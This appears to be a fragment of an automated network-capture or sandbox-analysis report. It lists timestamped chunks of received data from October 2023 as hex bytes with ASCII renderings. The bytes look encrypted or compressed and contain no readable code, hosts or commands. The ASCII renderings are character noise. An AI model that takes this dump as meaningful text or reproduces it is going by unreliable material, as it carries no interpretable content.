                                      2023-10-26 07:03:21 UTC211INData Raw: c5 6b f6 f3 cb b3 3b 7e c5 71 46 d1 5b f2 2d 7c 13 53 90 df 1d fc de 72 30 ab 06 8e 1e 45 48 23 06 e3 aa b6 8a 25 87 26 6a c1 c5 22 71 0e f3 95 05 c9 94 d0 14 d5 1f ac 96 87 4f 66 a3 27 af 5b 9c 14 d3 7a fd 67 8c 14 3b bc 4c 45 c5 85 1f d9 cb 37 7a 12 f4 34 0d 2d 7d 63 15 56 88 c6 d3 08 64 9f 03 d9 f0 71 91 cb a5 6e b7 db d2 78 79 ce cd b8 31 a2 a4 20 ee 7e 82 4f 02 47 56 bc a3 b5 8e d5 51 93 74 ec 37 4a da d6 3d 34 af f2 06 df ba 51 4b 3a 6f de 79 55 5f 42 a1 b6 a1 98 e6 75 eb c8 94 6e fb 5b ca df 85 1f ee f9 e2 c8 9d 53 17 56 aa e5 b3 5c 6c 34 ba fe 7e f4 43 9a 0d b5 98 64 00 e9 4c d9 6f 09 4d cc 30 59 ff d1 0c 0b ce ac a7 51 e9 b9 6f a6 87 4b 76 46 e8 f5 2e 14 02 85 c5 a7 fa 0c 6b b9 d2 32 c2 18 53 5d 70 72 03 c8 41 b5 94 91 87 10 19 16 66 17 ce 4b fb
                                      Data Ascii: k;~qF[-|Sr0EH#%&j"qOf'[zg;LE7z4-}cVdqnxy1 ~OGVQt7J=4QK:oyU_Bun[SV\l4~CdLoM0YQoKvF.k2S]prAfK
                                      2023-10-26 07:03:21 UTC212INData Raw: 3f 1c 4b 66 26 dd b1 dc 15 39 94 10 47 ce 59 77 f6 d9 80 aa c6 0e 93 a3 28 75 16 04 da b4 00 7d dd 8b 25 48 8a 67 6f 1f 42 08 2e 30 27 e3 93 5e 9e 79 a3 3d 25 d2 41 30 a3 35 76 70 98 b9 58 ee be 79 6f 21 85 46 24 e4 c4 19 d6 0a b1 ce 9a 42 74 4d 14 b8 db 85 b4 7a dd 94 f7 ce 3a 38 30 dc 74 f6 c4 f7 b6 2a 75 dc 7e 55 db 4d b0 19 7d 31 5e 91 df 06 d1 8b 6c 3f aa 06 ba 1e 43 61 1e 04 f5 91 aa e3 38 96 1f 54 fb c5 36 7f 0f f3 95 28 cf 94 d3 14 c9 6b 80 99 8a 5e 0a b5 01 b7 6d af 04 d9 7f ea 6d b4 12 3d b7 5a 37 a2 a5 05 e7 ed 3e 79 20 e2 2a 1c 0b 61 4a 1e 54 81 d7 c8 69 57 9f 60 d8 f0 60 a0 d2 b9 6c 94 db c6 19 53 c9 dc 82 0f a8 a7 22 e5 78 eb 6b 00 55 34 95 b7 8b 8a c0 4e fc 50 f9 37 59 ae fe 0c 3b bc f4 0e c1 df 69 5e 00 61 c0 59 58 5e 7c a1 a5 b2 8f eb 59
                                      Data Ascii: ?Kf&9GYw(u}%HgoB.0'^y=%A05vpXyo!F$BtMz:80t*u~UM}1^l?Ca8T6(k^mm=Z7>y *aJTiW``lS"xkU4NP7Y;i^aYX^|Y
                                      2023-10-26 07:03:21 UTC214INData Raw: 93 00 ed 86 e6 59 96 d6 1f ad 0b 7b c3 a0 b3 4b fd ea a9 1c 3a 87 0a db 03 39 f6 3a 4b 72 18 d7 c0 9b 64 2e ed d4 5d 48 27 cd a2 3c 08 4b 24 fa c2 7a 98 04 d5 d0 61 f2 98 d7 1f 82 58 97 a4 3f 22 f0 d2 c6 a9 26 c0 3d 07 4e c2 af 15 cc 9f 47 07 8f 0a 67 e8 13 38 de 8d 19 08 c1 2c 6e fe 2e 17 5f 0e 10 a8 b8 ca 2f 0e ae 19 5f c2 49 1e c5 bc a7 98 d3 13 82 d0 7b 74 17 2f d1 a2 1a 5b c1 e6 2f 44 8a 38 6e 1f 47 09 0d 2c 55 e1 8e 43 a6 16 9d 38 32 b3 4e 16 82 3d 6c 61 eb ca 6d e6 be 68 3c 2b 97 5e 35 89 d4 14 c2 01 b6 81 8e 50 5c 77 14 aa c4 f1 d2 71 d9 87 db 8a 1a 32 30 d9 6b e7 a0 de b0 0b 7e ce 5e 52 d0 4a b0 28 79 17 64 87 ac 0a e5 cc 14 1c 98 75 a4 15 54 6c 2f 16 f3 96 ad e3 3b 9b 00 59 ca d7 30 78 08 f3 ae 0e ce 84 db 05 a7 4a 87 8b 8f 4a 64 a3 00 8a 5c 98
                                      Data Ascii: Y{K:9:Krd.]H'<K$zaX?"&=NGg8,n._/_I{t/[/D8nG,UC82N=lamh<+^5P\wq20k~^RJ(yduTl/;Y0xJJd\
                                      2023-10-26 07:03:21 UTC215INData Raw: 4b c3 78 1a e0 a3 67 8d 06 94 41 39 54 ec 34 37 e6 a7 53 e0 70 1c 4c af 02 c2 f6 76 61 3d 8c 7d 3e 48 3a 96 7b 55 9e 76 7c 66 5e d6 c9 44 8e bd 9b 6c 49 d3 f4 67 0a f1 bf eb 50 e6 78 f7 d9 b6 8d b0 66 d5 88 89 97 8f 9a b1 3c 6b 83 e3 92 6f fc e8 6e c1 d4 71 cf d4 69 9a f4 2f 02 70 01 81 00 cd 8b fe 2e b4 f4 5b f1 14 2f 94 ac b6 2e fb dd c3 08 3e a0 78 d0 00 11 f4 36 22 4a 03 ca e1 9d 6a 2e c2 cf 2a 0f 26 ce e4 06 1d 5d 1f f9 c9 27 b3 15 ed bf 79 94 99 c1 0e a9 16 ab 80 70 0a f2 d2 80 a1 31 d1 05 3d 44 de a6 19 ef f6 4e 06 94 22 2b c3 1c 2b df 8f 7c 2c cd 36 55 dd 3c 79 4b 03 10 f7 94 c8 15 2a a2 0c 7d c4 7d 1e df d8 9b 9f bf 33 8c e7 5a 72 13 1c f6 8c 0c 18 cb be 0d 6f 86 38 6d 11 7b 13 22 20 48 c0 93 6f aa 16 83 31 32 fe 42 10 a4 30 65 53 82 d5 5b c9 b3
                                      Data Ascii: KxgA9T47SpLva=}>H:{Uv|f^DlIgPxf<konqi/p.[/.>x6"Jj.*&]'yp1=DN"++|,6U<yK*}}3Zro8m{" Ho12B0eS[
                                      2023-10-26 07:03:21 UTC216INData Raw: 2a 45 8f ea 01 cb e8 2d d2 f6 56 bd 32 ce 7e df da 23 7e c8 d4 4f 8a 37 91 93 e0 72 c0 29 08 5a 03 84 e2 20 f1 07 05 cf 5e 32 a8 cb 7e 1c 80 45 75 bc 04 d1 8a f6 d5 dd ab f1 1d 34 2f 65 c1 d2 2f 7f 83 c7 8f 47 ac 8f fa 9e de ab 74 90 e5 3b 5e 12 7e e7 ec 84 af 36 6d 0e 94 55 03 51 06 26 fb 08 53 ff b8 11 f4 59 84 37 40 06 e0 51 02 90 9b 3d c9 70 00 19 87 6e eb 80 3e 57 47 ce 48 44 53 3a bf 48 5c d7 62 0d 43 1b ba f5 1d 8e a0 d5 57 28 8f c5 79 48 86 b8 f1 00 c0 15 a2 8b 8f f4 d2 11 b9 fb a4 da 98 e2 cf 4b 1f b2 d6 e5 1f 89 9e 59 c5 ac 55 97 a3 62 d5 9e 07 46 7a 55 f2 41 da ea 89 09 ae a3 12 c2 20 1e de c9 ec 2e d3 9e e4 7a 7b d7 1c b4 13 5c b5 4e 03 27 3e a7 88 f4 7d 4b e3 a0 67 0f 31 b9 d1 6f 70 33 0d 9f 93 54 b4 61 d3 d0 30 94 fe ad 46 f6 3a c4 85 70 73
                                      Data Ascii: *E-V2~#~O7r)Z ^2~Eu4/e/Gt;^~6mUQ&SY7@Q=pn>WGHDS:H\bCW(yHKYUbFzUA .z{\N'>}Kg1op3Ta0F:ps
                                      2023-10-26 07:03:21 UTC217INData Raw: 73 85 e9 cf 3f 37 86 4c 14 5b 23 22 85 a9 90 fe 56 66 6b 98 64 92 b4 56 c7 c2 77 28 37 37 97 ae ba 58 5c 5e c1 5c cc 6f 6f b7 c7 a2 6e 63 73 3e 52 59 31 9a 50 bb 4c 81 54 91 78 ad 71 4e 73 13 5f 8b 08 52 31 aa 89 01 03 94 62 02 8e 64 25 cc fc 8b 5b 76 17 cf 70 00 29 c3 ce d8 f4 dc 96 66 45 94 b2 6a 89 e5 59 ff 87 5f e8 0a ce 62 96 a0 58 53 ab e0 20 89 61 96 93 87 35 b0 7b 3c 2c 21 fe a7 74 8d 68 26 f7 7e 48 fa 99 3a 4e e7 36 0e d6 17 93 d7 8c a8 b2 ef b1 15 4e 69 5d 8c a8 52 7f 83 cc f4 42 b9 8f 88 9e ec b8 60 90 88 2e 44 12 52 e7 cc 84 d9 36 55 0e ad 55 23 51 4e 25 f0 08 2e d8 c1 02 f6 59 b6 37 7c 06 e6 51 0b 90 99 3d c1 70 2a 19 9e 6e b4 8f 0d 57 44 ce 52 44 67 3a 87 48 53 d7 6c 0d 30 10 c1 fe 76 8e 84 d5 63 28 97 c5 1e 59 fd bf da 00 fc 15 91 8b a4 e5
                                      Data Ascii: s?7L[#"VfkdVw(77X\^\ooncs>RY1PLTxqNs_R1bd%[vp)fEjY_bXS a5{<,!th&~H:N6Ni]RB`.DR6UU#QN%.Y7|Q=p*nWDRDg:HSl0vc(Y
                                      2023-10-26 07:03:21 UTC218INData Raw: 05 f9 87 35 a5 ef 55 5a ff 47 01 69 8d a6 e4 d8 d9 32 23 b1 2e cc 11 df 41 9b f6 a8 d2 ce ce 3e 5f 03 c0 cc b2 65 32 5c b8 a5 54 80 32 43 07 27 49 85 26 b2 2f f8 f2 2a af 5b ee 95 14 eb 4e 8e 4b 82 7a 46 17 9d 98 3d 26 7e 17 41 6d 5a ae b9 53 3a a3 34 7b 6b 9a d9 1e fd 38 03 91 a5 c6 17 c3 c9 fd 7c 4a f4 4c 7a 20 47 64 e0 98 fe cf 22 1b 02 98 0e e9 d8 12 c7 ce 44 64 74 4a af ae 8f 23 6a 1d 87 08 8a 3d 5c fb ea df 5c 63 4e 45 64 0e 08 f3 7d d5 78 fc 15 91 2a d6 43 05 5e 56 1e d2 30 1e 77 ef cb 47 2e c0 51 7f c8 64 18 b7 cb cd 6e 47 2e ff 31 7d 1e c3 f0 a3 c1 9a a2 50 7d e9 b3 5d d5 9e 30 ab e9 1e 8c 48 a1 1f e1 a0 22 28 8b a6 65 b8 19 eb e7 87 53 90 15 3c 47 5a 9b e2 10 c3 48 72 b4 3b 3a a8 fc 47 2a e7 5a 75 b8 51 e7 e4 e5 d5 d3 ef d4 6e 4e 66 6d b4 98 2f
                                      Data Ascii: 5UZGi2#.A>_e2\T2C'I&/*[NKzF=&~AmZS:4{k8|JLz Gd"DdtJ#j=\\cNEd}x*C^V0wG.QdnG.1}P}]0H"(eS<GZHr;:G*ZuQnNfm/
                                      2023-10-26 07:03:21 UTC220INData Raw: ef ad 6e c0 f8 15 a8 db 34 bd 74 e6 79 d9 8c 3f 40 25 89 9b bf 6d 18 ed 7e 77 cf 2d bf b5 7f a1 e7 09 cd e7 9b 18 c7 71 1a a8 6f 71 35 08 5c 43 c7 26 d0 71 5a 6e 5b ea 4b 74 5a a4 69 05 b9 ce 9a a5 5d 2a 06 93 5c fe 57 e5 2c 72 f1 ef 73 83 d9 d6 c5 78 78 7f 10 9b fa cc f4 9a d0 8e ec 76 ce f4 18 d2 db 3a 69 8d 02 65 5e 8d 82 97 9a ad 0a 51 86 1d ff 11 fb 32 da 82 ed a0 8a fc 07 5f 38 a2 fd de 27 5d 6a da 97 64 b7 32 6b 77 65 28 84 10 e5 5c 91 85 44 c0 3f 9c fa 70 9c 11 fd 3d a2 1b 02 7b f2 ed 50 43 1f 17 3f 24 34 c0 99 30 6a d1 55 1e 18 fe aa 77 8a 75 6c f0 d7 af 73 af e9 fd 28 1a 86 23 1f 50 23 34 85 f9 90 bc 56 68 6b ef 6f 86 b4 60 c7 e3 77 64 2e 19 97 c3 b7 57 5c 6d c1 58 cc 5c 6f 88 c7 ac 6e 14 78 2a 52 7c 31 97 50 d5 0d af 54 fe 6b b0 71 71 73 21 5f
                                      Data Ascii: n4ty?@%m~w-qoq5\C&qZn[KtZi]*\W,rsxxv:ie^Q2_8']jd2kwe(\D?p={PC?$40jUwuls(#P#4Vhko`wd.W\mX\onx*R|1PTkqqs!_
                                      2023-10-26 07:03:21 UTC221INData Raw: 37 a8 cc 9e 3d aa 98 be 73 57 29 35 9c a9 91 43 9f 7e b4 0a 4c 28 ab 66 9a b3 22 05 18 a1 3c bb 7b d9 a3 5e 04 2f 0d ad a5 81 e3 53 a0 be 50 14 03 37 9f 83 20 b6 b1 1d 14 4f ae f1 3f ae 31 5e 42 dd 94 56 17 fb 47 29 cf e9 2d d4 3d af 28 18 1c ba 76 4f f9 fd 4d 0b 98 61 41 d5 87 48 4b 81 cc 1d c0 cb 5a dd 9f 47 d8 11 80 0b b8 e2 4a 21 49 e4 ef da 31 25 a8 7e 0a bf 4e de c7 0c d8 94 79 ba 93 f4 7d b5 15 7e fb 52 05 35 56 34 31 b3 47 a4 16 2a 0b 28 ea 7e 11 75 ca 46 71 d8 bc f9 cc 3e 4f 69 e0 29 fe 28 86 58 13 df 9b 17 e6 a0 b1 ab 17 56 0d 73 e2 95 cc 88 ca ff ef ec 14 ba 87 2e a5 90 55 13 ff 5a 01 36 8d c8 e4 f2 d9 0a 0e c2 2e 86 11 9c 41 86 f6 b8 d2 fa ce 63 5f 52 c0 89 b2 42 32 18 b8 cb 54 d3 32 17 07 00 49 e9 63 8a 2f ff f2 6a af 5c ee 9c 14 fb 4e fd 46
                                      Data Ascii: 7=sW)5C~L(f"<{^/SP7 O?1^BVG)-=(vOMaAHKZGJ!I1%~Ny}~R5V41G*(~uFq>Oi)(XVs.UZ6.Ac_RB2T2Ic/j\NF
                                      2023-10-26 07:03:21 UTC222INData Raw: 2d d3 79 33 7b 4a 5d f1 01 71 78 f0 af 30 43 58 1f 8a d5 e8 22 23 99 3a 0f f0 49 fc 9f 14 9f d0 8a 3e 31 57 d5 95 31 e4 21 40 f3 84 ad 82 2f 68 d8 29 d8 5c 68 27 a5 da f5 05 3e da 0d af 5e ef 78 de e9 9f c9 9a fb 19 92 56 28 16 94 29 7a 27 66 46 4e 90 8b 9e af e7 a4 a3 c5 b3 a4 a1 41 45 a8 a4 da 5e d3 fd d0 1d 13 5d 5b ef da f4 43 f2 3f c2 46 29 64 d9 33 e9 e0 0c 40 60 f3 51 e8 17 89 a3 1d 38 60 5e eb c0 c8 91 1f d6 fb 35 14 42 73 a1 fa 20 d5 8d 41 5c 1a c1 81 4c ca 45 3f 7c a9 94 3c 2b 89 68 75 87 8a 42 bb 4e c1 5c 7e 22 d3 76 2b c3 d3 4d 62 a4 18 11 bb e8 2c 39 ef b8 6e fe cb 49 a7 a3 34 f7 74 d0 79 d7 8c 38 40 3d 89 d1 bf 31 15 94 7e 4c cf 3d bf a2 7f aa e7 47 cd 93 94 41 c7 3a 1a ae 6f 76 35 02 5c 43 c7 79 d0 16 6b 37 5b ba 44 70 5a b9 69 02 b9 9c 9a
                                      Data Ascii: -y3{J]qx0CX"#:I>1W1!@/h)\h'>^xV()z'fFNAE^][C?F)d3@`Q8`^5Bs A\LE?|<+huBN\~"v+Mb,9nI4ty8@=1~L=GA:ov5\Cyk7[DpZi
                                      2023-10-26 07:03:21 UTC223INData Raw: d7 41 b5 69 88 f0 a1 f1 3f 61 4d ea 47 bf 29 07 33 32 44 6b 45 d5 55 37 18 e5 3e a5 c7 ac dd 2c 32 1d 4a 37 c8 9b 6c 69 59 53 a3 f5 74 c8 6c 93 4b ef c6 7c 72 96 9e ad 45 01 0a 1b 45 e6 5b 74 54 3a 8c e1 be 33 e0 9a 8d 6e 71 e4 46 75 69 6f d7 cc 3a b6 12 3d 60 66 ba bb d6 fd a3 24 3c 70 a3 1d 41 1e 23 2f 87 01 4d 24 84 ff 55 31 31 70 e4 b2 9c 50 46 f8 48 62 9e 69 99 d9 60 f6 b1 e6 5d 54 34 a6 f0 11 97 09 33 8b aa 95 e1 19 07 f1 44 84 5c 3d 61 f1 b3 a5 69 1e bf 4e f5 31 86 15 b2 84 f3 a8 fb 95 19 cf 0a 4d 50 e6 40 26 4b 20 23 3a ca fb f7 c3 8b cd cf b6 d2 d0 fd 6f 37 dc c1 a2 3d a7 98 d0 04 4f 29 0d 9c b3 91 31 80 4b b4 33 4c 05 ab 5f 9a b3 22 34 18 9c 3c 9a 7b ec a3 50 04 30 0d 99 a5 a7 e3 78 a0 89 50 75 30 1e 9f da 20 9e b1 28 14 76 ae e4 3f b9 31 1f 42
                                      Data Ascii: Ai?aMG)32DkEU7>,2J7liYStlK|rEE[tT:3nqFuio:=`f$<pA#/M$U11pPFHbi`]T43D\=aiN1MP@&K #:o7=O)1K3L_"4<{P0xPu0 (v?1B
                                      2023-10-26 07:03:21 UTC225INData Raw: eb 85 8b 86 30 89 aa 5d 5e 1c 07 8e ac 48 0a db ac 71 1d 4e 8a dc 3c df af 31 c5 1f 0e 65 1a 73 7b 49 61 74 cf 62 4d d3 1b 9c ef 25 fe 90 b9 ee 4b c3 70 07 0a 75 d4 38 d7 03 ef 53 ab 54 01 e5 ed 9f 9f 8a 94 2f ec 0a 50 89 a4 a9 81 9b 99 a2 88 4b ea f1 76 66 a2 6d 79 8f e7 1c ee b3 14 d7 54 b5 69 88 f5 a1 fb 3f 65 4d db 47 92 29 38 33 20 44 55 45 c1 55 20 18 df 3e a5 c7 bf dd 34 32 5a 4a 34 c8 9e 6c 6c 59 3e aa d3 74 e8 6c b0 4b ca c6 0e 75 b0 9e 90 45 30 0a 6d 42 c1 5b 5b 54 07 8c 9b b7 62 ed 8f 8d 4f 71 ba 46 1e 70 50 d7 99 3a c6 0b 22 60 44 ba b7 d6 f9 a3 29 3c 7c a3 16 41 03 23 73 87 68 10 16 84 c6 55 43 3e 5e e4 b6 9c 41 46 f6 48 7a 9e 27 99 eb 60 9f bc da 5d 50 34 a6 f0 42 97 76 33 97 aa ad f4 7c 07 95 44 8c 5c 2b 61 f6 b3 90 69 4c bf 7b f5 3b 86 0a
                                      Data Ascii: 0]^HqN<1es{IatbM%Kpu8ST/PKvfmyTi?eMG)83 DUEU >42ZJ4llY>tlKuE0mB[[TbOqFpP:"`D)<|A#shUC>^AFHz'`]P4Bv3|D\+aiL{;
                                      2023-10-26 07:03:21 UTC226INData Raw: 1d a0 b7 ef 56 87 a9 03 9f f5 04 3a 4f 8f c7 47 10 67 94 c5 96 95 05 1b f8 b7 76 c2 75 26 1f 02 4b 6d f3 14 b3 f1 97 87 1b 7c 0d 39 0d bd 45 89 fb 2b 8b b5 c8 0e fd 3c db aa 18 24 a9 c6 4a 76 70 84 d7 70 09 4a 50 ef 69 c9 02 63 70 3c 85 de c3 cb 19 6e 54 9e 82 91 ec 23 37 20 08 0f 8e eb db 8b cc 30 cb aa 12 5e 55 07 b3 b7 35 0a a9 ac 0c 1d 40 8a d1 3c b2 af 7d c5 51 0e 3b 1a 39 7b 27 e1 87 e4 06 60 d3 30 d4 de 71 cc c4 8a be 7f e3 45 57 3c 14 e3 4b ef 70 d6 24 ea 3b 43 97 ae fb db 8a ca 7c aa 47 17 dd ec f9 c8 bb d3 f2 c3 2a a6 82 3b 15 ec 1a 36 e0 b7 6e bf d7 46 d7 08 95 3d db a0 c4 ad 4d 32 3b 83 22 cb 5b 62 33 60 13 37 2c a2 3b 44 7c ba 51 c3 b0 d8 ae 5c 12 33 07 5e a9 f5 05 00 35 53 8a bd 35 87 1c c0 3b bb c6 25 36 c3 d1 e4 08 45 5a 1b 2e b6 2e 23 27
                                      Data Ascii: V:OGgvu&Km|9E+<$JvppJPicp<nT#7 0^U5@<}Q;9{'`0qEW<Kp$;C|G*;6nF=M2;"[b3`7,;D|Q\3^5S5;%6EZ..#'
                                      2023-10-26 07:03:21 UTC227INData Raw: a9 b5 7d b8 c3 bb 8b 7a 82 7d 6c 5e 34 a9 c6 84 eb 9d 3d ce 13 b8 52 0c da ae 5c 6c ce a2 63 8a df 06 3f 45 0d eb 1c 1b 2b 3f c4 a9 d3 da 8e 50 99 eb db 28 91 1b a9 f5 cc 5d 8b bd 96 89 fb 13 72 7f aa cd d6 62 19 3b d3 d6 07 c1 27 d8 63 fa f1 38 69 a0 3e e5 2a 5b 2c 93 43 03 9b bf 7a 53 a0 d9 fe 60 87 b2 03 a0 f5 24 3a 64 8f c0 47 10 67 9b c5 f3 b8 05 1b 99 b7 2f c2 38 26 40 02 7a 6d dd 14 af f1 8f 87 2b 7c 03 39 01 bd 4d 89 c8 2b ae b5 d4 0e e6 3c ce aa 5f 24 ac c6 41 76 6a 84 d7 74 1c 4a 72 ef 58 c9 3b 63 7d 3c f6 c5 f9 cb 54 7f 46 9e 9f 91 98 23 37 20 39 0f 9c eb db 8b c8 30 a4 a3 33 5e 7c 07 e7 ac 35 0a e6 bf 39 1d 3e 8a d1 3c a1 af 70 c5 4b 0e 2d 1a 20 7b 3c e1 f5 f5 23 60 b0 2b ff de 4a cc e5 8a 80 7f b7 45 74 3c 75 fa 1a ef 56 d6 20 ea 31 43 97 ae
                                      Data Ascii: }z}l^4=R\lc?E+?P(]rb;'c8i>*[,CzS`$:dGg/8&@zm+|9M+<_$AvjtJrX;c}<TF#7 903^|59><pK- {<#`+JEt<uV 1C
                                      2023-10-26 07:03:21 UTC228INData Raw: 36 8c df 1c 89 96 14 3c d9 68 dd 12 37 3e 47 15 86 9b d9 90 4b 80 6b 7c af c0 45 14 73 83 dc 0a bd 82 b7 02 a7 68 e9 9c e6 1f 0a c6 7d 93 32 9e 76 d3 1b e8 03 b2 7b 3d db 44 37 83 c0 18 b8 c5 5b 7a 41 e4 46 68 65 4f 2f 2f 31 83 a3 d5 08 49 ec 01 ab c3 14 b1 87 89 09 8c be d5 78 4a a5 dc c1 0f cd a2 47 fd 0c ec 0a 0f 26 1a d0 af fe 85 ac 54 fc 13 88 6f 38 da 84 16 5a 8a 95 0c b2 a8 3f 51 75 61 b4 73 36 4a 11 a0 d7 b6 fb fc 10 b9 c8 e9 0c bf 3e 99 ab cc 5c c1 97 d2 a1 94 3a 05 24 c4 b6 ba 3f 76 46 b2 8a 63 bd 42 ff 11 c1 d1 02 5b 8c 10 d9 1a 65 70 bc 20 3c fd 94 1d 6e a0 b3 80 30 f5 dd 64 c3 db 4b 50 29 eb a1 28 79 10 f7 ab f3 f9 59 74 c9 d6 40 a6 5b 43 2f 70 17 43 bc 67 c6 94 e3 f3 77 08 62 50 62 d3 2e ee a7 58 db 9b ba 4f 92 5f bd c9 71 4b c5 b3 2f 18 03
                                      Data Ascii: 6<h7>GKk|Esh}2v{=D7[zAFheO//1IxJG&To8Z?Quas6J>\:$?vFcB[ep <n0dKP)(yYt@[C/pCgwbPb.XO_qK/
                                      2023-10-26 07:03:21 UTC229INData Raw: f8 f4 81 bf 09 f6 b3 28 7e 74 29 b8 a9 74 38 ae df 42 42 fe 53 39 1b 2e 13 4b 43 1a ff f6 76 d2 61 c4 79 46 ee 2d 0f d1 6e 00 21 eb c4 3e db d2 32 3c 03 f6 6e 41 fe 82 58 b7 30 c2 b5 fe 03 32 5c 75 83 a8 ab d2 4d bc af 84 b9 7f 79 51 f1 07 e8 a0 80 c0 78 1b d5 3f 26 a1 53 b0 3e 1a 14 36 be df 51 89 e3 14 09 d9 71 dd 56 37 63 4a 1e 86 c2 d9 d7 4b 8e 6b 0a a4 8e 45 3a 7c 9f dc 0f bd 93 b7 71 b2 7b e9 91 e6 5e 0a a5 64 ac 32 9e 76 d8 1b ff 03 b4 7b 3e db 29 2c a1 c0 18 b8 da 5b 7c 41 f8 46 1a 48 77 2f 19 31 8e a3 cf 08 5a ec 12 ab ec 14 ff ac 86 09 bf be c3 78 47 a5 c4 c1 5d cd 90 47 ff 0c ed 0a 1e 26 55 d0 a1 fe 8e ac 61 fc 7f 8b 37 38 ac 9b 39 5a a2 95 07 b2 bd 3f 3f 7e 27 b4 32 36 47 11 ab d7 b4 fb 8e 05 f6 c8 a9 0c f8 3e ce ab a5 7b e5 97 c9 a1 8e 3a 00
                                      Data Ascii: (~t)t8BBS9.KCvayF-n!>2<nAX02\uMyQx?&S>6QqV7cJKkE:|q{^d2v{>),[|AFHw/1ZxG]G&Ua789Z??~'26G>{:
                                      2023-10-26 07:03:21 UTC231INData Raw: fb a9 40 56 f7 78 b4 6a 60 95 2c 4b 55 76 99 b2 a4 10 2a 8e d3 5d 7c 42 ce a2 00 71 4a 50 fb af 6e d6 41 a1 d0 2d a8 fe c6 7a 84 58 fa f7 31 4d e7 a6 b6 ce 2f b4 0b 4f 48 ab a9 7d cc 9f 49 62 94 55 45 8d 47 5f 96 f9 19 78 88 58 31 ab 0e 79 48 66 0d a8 b4 ba 50 4b 86 69 41 ab 43 77 c7 bc 95 e8 dc 7a 8f d0 28 2c 31 5b c8 cd 1d 18 cd 8b 62 2d ae 38 4b 7e 47 7d 3d 43 46 a4 95 2a ab 16 e4 54 04 b3 5f 74 be 5c 77 15 98 b9 5b 87 a0 1c 60 58 a3 32 32 89 e7 75 c5 6d e2 ce ba 35 53 21 01 df c9 85 d2 1d fa f3 e8 ce 10 54 32 ac 6c 93 a0 bd 96 4f 72 a8 49 27 dd 3e dc 58 7e 75 5f e2 df 5c df b8 7d 55 af 06 bc 7b 5b 3e 2e 65 ef fa 85 e3 1e f3 18 0b ca a4 37 14 5c f3 98 6b dc f1 c3 71 c6 1f e9 e7 af 2d 78 c6 0d c3 56 ec 1f bc 6e 8f 6e c0 5b 5c 99 29 45 c5 af 71 cf a9 28
                                      Data Ascii: @Vxj`,KUv*]|BqJPnA-zX1M/OH}IbUEG_xX1yHfPKiACwz(,1[b-8K~G}=CF*T_t\w[`X22um5S!T2lOrI'>X~u_\}U{[>.e7\kq-xVnn[\)Eq(
                                      2023-10-26 07:03:21 UTC232INData Raw: 83 3d e5 70 01 19 91 6e 94 80 32 57 6e ce 63 44 5f 3a d2 53 46 d7 75 0d 57 1b df fe 13 8e 89 d5 4f 28 98 c5 71 48 eb bf f2 00 c5 15 a8 8b 8f d4 b0 11 bc fb a8 da 8d e2 8e 4b 18 b2 d4 e5 09 89 ea 5c d2 ac 5c 97 c7 69 8e 9e 00 46 54 55 99 41 f2 ea ec 2e a5 a3 4b c2 1d 1e c6 c9 b5 2e ff 9e a9 6b 01 d7 19 b4 03 5c f0 4e 39 27 30 a7 dd f4 68 4b 8e b5 01 0f 15 b9 c3 6f 05 38 35 9f dd 54 b0 61 ce d0 76 94 a2 a4 7a f9 17 c4 85 70 2f 97 cf c6 ba 43 c1 62 22 2b ab eb 32 b8 ed 20 00 fb 3c 2b f9 7d 2a b6 94 19 27 a4 0d 31 c1 4b 1c 38 14 64 88 d7 fe 70 2a d6 1d 33 ca 2a 77 ba fe f4 9a bf 1b f6 a6 28 74 74 5b f3 8f 74 6a ae ea 42 5b fe 5d 39 2d 2e 12 4b
                                      Data Ascii: =pn2WncD_:SFuWO(qHK\\iFTUA.K.k\N9'0hKo85Tavzp/Cb"+2 <+}*'1K8dp*3*w(tt[tjB[]9-.K
                                      2023-10-26 07:03:21 UTC232INData Raw: 25 27 d0 f6 5d d2 77 c4 26 46 d6 2d 28 d1 1e 00 67 eb d8 3e f1 d2 79 3c 75 f6 70 41 fb 82 1a b7 1a c2 bd fe 50 32 53 75 83 a8 d0 d2 65 bc 96 84 bc 7f 74 51 e8 07 f2 a0 c6 c0 2e 1b a9 2c 64 bc 51 b0 37 1a 19 36 c2 df 31 89 d7 14 23 d9 69 dd 7b 76 73 4a 04 86 8a d9 8f 4b 96 6b 58 af d0 45 61 7c 97 dc 02 bd 9e b7 2d a7 5c e9 90 e6 5f 0a a9 64 ae 32 89 76 ec 1b e3 03 b5 7b 2f db 75 37 90 c0 02 b8 cc 5b 6d 41 b7 46 2c 48 72 2f 0e 31 8e a3 a1 05 78 ec 08 ab e7 14 90 87 a7 09 b5 be a0 57 61 a5 c7 c1 12 cd a4 47 e7 0c e7 0a 30 26 77 d0 ae fe 99 ac 52 fc 7e 8b 37 38 86 9b 09 5a bd 95 06 b2 ad 3f 1f 75 49 b4 7d 36 5f 11 a5 d7 d3 e0 c1 10 e9 c8 be 0c e3 3e c8 ab ec 7b c9 97 e4 a1 94 3a 05 24 d9 b6 b3 3f 6b 46 d3 bd 48 bd 57 ff 06 c1 83 02 08 8c 1e d9 79 65 43 bc 25
                                      Data Ascii: %']w&F-(g>y<upAP2SuetQ.,dQ761#i{vsJKkXEa|-\_d2v{/u7[mAF,Hr/1xWaG0&wR~78Z?uI}6_>{:$?kFHWyeC%
                                      2023-10-26 07:03:21 UTC233INData Raw: 5f 71 0a 50 9f fa 74 d6 50 a1 fe 0e ac fe 91 7a d6 58 ec f7 38 4d f6 a6 b5 ce 2b b4 4e 4f 0b ab be 7d dd 9f 52 62 88 55 42 8d 12 5f d8 f9 39 7b 96 58 1d b2 6b 79 56 66 05 a8 a3 ba 19 4b a0 69 56 ab 0a 77 d3 bc 8d e8 cb 7a 93 d0 05 11 1b 5b ca cd 10 18 cb 8b 30 2d d7 38 38 53 7b 7d 25 43 4c a4 98 2a bd 16 b3 54 66 b3 49 74 b0 5c 74 15 8a b9 5c 87 b3 1c 4f 58 93 32 61 89 e4 75 d8 6d b0 ce 93 35 53 21 01 df a8 9a 81 16 ed f3 c8 ce 16 54 25 ac 62 93 80 b2 a6 4f 74 a8 4d 27 d1 3e d1 58 6e 75 16 e2 ec 7f 89 b3 60 55 b8 06 bf 7b 5b 3e 2f 65 86 f9 f1 e3 4b f0 42 0b af a9 10 14 32 f3 95 6b ec f1 e2 71 e2 1f e9 dd ef 2d 45 c6 26 c3 78 ec 33 bc 58 8f 57 c0 32 5c 9f 29 72 c5 8e 71 ec a9 12 1f 07 97 0f 68 0d 13 7d 7a 11 ef a3 b4 5b 3b a9 60 fa 95 41 ff c2 ca 47 d0 fd
